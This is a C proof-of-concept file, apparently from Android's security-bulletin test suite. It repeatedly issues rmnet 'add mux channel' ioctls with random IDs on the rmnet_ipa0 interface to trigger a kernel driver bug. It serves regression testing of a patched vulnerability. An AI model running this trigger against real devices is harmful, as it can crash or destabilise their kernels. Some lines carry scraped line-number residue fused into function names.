1 /**
2  * Copyright (C) 2018 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions vand
14  * limitations under the License.
15  */
16 #define _GNU_SOURCE
17 #include <errno.h>
18 #include <fcntl.h>
19 #include <net/if.h>
20 #include <net/if_arp.h>
21 #include <netdb.h>
22 #include <netinet/in.h>
23 #include <stdio.h>
24 #include <stdlib.h>
25 #include <string.h>
26 #include <sys/ioctl.h>
27 #include <sys/prctl.h>
28 #include <sys/socket.h>
29 #include <sys/types.h>
30 #include <time.h>
31 #include <unistd.h>
32 #include "local_poc.h"
33 
34 #define WAN_IOC_MAGIC 0x69
35 #define WAN_IOCTL_ADD_FLT_RULE 0
36 #define WAN_IOCTL_ADD_FLT_INDEX 2
37 #define WAN_IOC_ADD_FLT_RULE                                                   \
38   _IOWR(WAN_IOC_MAGIC, WAN_IOCTL_ADD_FLT_RULE,                                 \
39         struct ipa_install_fltr_rule_req_msg_v01 *)
40 
41 #define WAN_IOC_ADD_FLT_RULE_INDEX                                             \
42   _IOWR(WAN_IOC_MAGIC, WAN_IOCTL_ADD_FLT_INDEX,                                \
43         struct ipa_fltr_installed_notif_req_msg_v01 *)
44 
trigger(int sfd,char * ifname)45 int trigger(int sfd, char *ifname) {
46   int ret;
47   struct ifreq ifr;
48   unsigned cmd = RMNET_IOCTL_EXTENDED;
49   strlcpy(ifr.ifr_name, ifname, IFNAMSIZ);
50   struct rmnet_ioctl_extended_s extendata;
51   int i;
52   ifr.ifr_ifru.ifru_data = &extendata;
53   extendata.extended_ioctl = RMNET_IOCTL_ADD_MUX_CHANNEL;
54   for (i = 0; i < 3; i++) {
55     extendata.u.rmnet_mux_val.mux_id = rand();
56     printf("[-] call ioctl %d\n", i);
57     if (ioctl(sfd, cmd, &ifr) < 0) {
58       printf("%s, %s\n", __func__, strerror(errno));
59       ret = -1;
60     }
61   }
62 
63   return ret;
64 }
65 
main()66 int main() {
67   int sockfd;
68   char *ifname = "rmnet_ipa0";
69 
70   srand(time(NULL));
71 
72   if ((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
73     printf("socket = %d, %s\n", sockfd, strerror(errno));
74     exit(1);
75   }
76 
77   trigger(sockfd, ifname);
78   return 0;
79 }
80